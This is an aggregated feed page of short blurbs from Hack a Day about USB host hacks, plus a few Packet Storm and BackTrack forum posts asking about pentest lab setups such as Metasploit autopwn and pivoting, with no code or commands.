[Sven Killig] Has managed to get his Nexus One into USB host mode. This allows him to plug in all kinds of peripherals such as web cams, keyboards, even a displaylink unit. This is fantastic as it really opens up the possibilities of this device. You can see that he now has an amazingly functional [...]
-
-
12:00
»
Hack a Day
[Simon Inns] is still hard at work making USB connectivity for PIC microcontrollers easier for the hobbiest. He’s released a framework for PIC based USB devices under Windows. It includes the firmware needed for USB compatible 18F PIC chips as well as a C# class library and example programs for the Windows side of things. [...]
-
-
9:32
»
Hack a Day
[Micah Dowty] has implemented full speed USB host control on a Propeller microcontroller. He’s motivated by the thought of using USB based WiFi and Bluetooth dongles in his projects as ready-made solutions.We’ve seen USB host control with the Arduino and it really opens up the flood gates for advancing your projects through storage, wireless connectivity, [...]
-
-
15:00
»
Packet Storm Security Tools
Known Host Cracker (khc) is a small tool designed to recover hashed known_host files back to their plain-text equivalents.
-
-
22:19
»
remote-exploit & backtrack
I have been out of the loop for about a year now. About 20min ago I installed BT4 on VM player 3.0.1 Everything seems to work fine. Sadly I have been damned to Windows 7 as a host OS at work. I would like to use the LAN eth0 for surfing on the host OS (Windows 7) while I am using BT4 final in the VM using my Alfa AWUS036H 500mW to connect to another AP. For some reason BT inherits the host IP. I take it this has something to do with NAT. Anybody know how this is fixed?
-
-
11:17
»
remote-exploit & backtrack
hi,
is it possible to use the autopwn function to check a host if it would be possible to be exploited without exploiting it?
or is there any other way to check a host against all exploits from metasploit without compromising the host?
-
-
11:00
»
Hack a Day
There’s a simple hack to use your Motorola Droid phone as a USB host. It is a hardware-only hack that doesn’t require you to crack open your phone, root it, or even to change firmware (although device drivers in the stock Android image may be quite limited). The dongle above is used as a key [...]
-
-
18:56
»
remote-exploit & backtrack
I have a training lab setup and I am having trouble trying to double pivot. I have a firewall showing an FTP server thru, i have exploited the FTP server, scanned internally, found some hosts. Setup a pivot through the FTP server and exploited a host, this host has a second NIC and another host behind it. I have setup another route through the host but i cannot get any of my exploits to work against the second host.
Just wondering if anyone has done this before, or if it is even possible to double up pivots.
If needed I can give more details, IPs and such...
Thanks for any help
-
-
11:41
»
Hack a Day
[I-Bot] has put together some libraries that make it easy to use gaming controllers with an Arduino. They interface through the USB host shield. This means that PS3 controllers connect via USB through a cable or a dongle. With the Wii remote things get a little more interesting. A Bluetooth dongle is used to make [...]
